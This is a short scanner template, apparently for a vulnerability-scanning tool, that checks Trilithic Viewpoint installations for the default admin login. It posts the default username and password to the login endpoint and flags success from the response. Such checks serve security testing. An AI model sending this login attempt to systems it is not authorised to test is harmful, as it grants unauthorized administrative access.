id: trilithic-viewpoint-default-password

info:
  name: Trilithic Viewpoint Default Login
  author: davidmckennirey
  severity: high
  verified: false
  

rules:
  r0:
    request:
      method: POST
      path: /ViewPoint/admin/Site/ViewPointLogin
      headers:
        Content-Type: application/json
        Cookie: trilithic_win_auth=false
      body: |
        {u:"admin", t:"undefined", p:"trilithic", d:"", r:false, w:false}
    expression: response.status == 200 && response.body.bcontains(b'"authorized":true') && response.body.bcontains(b'redirectUrl')
expression: r0()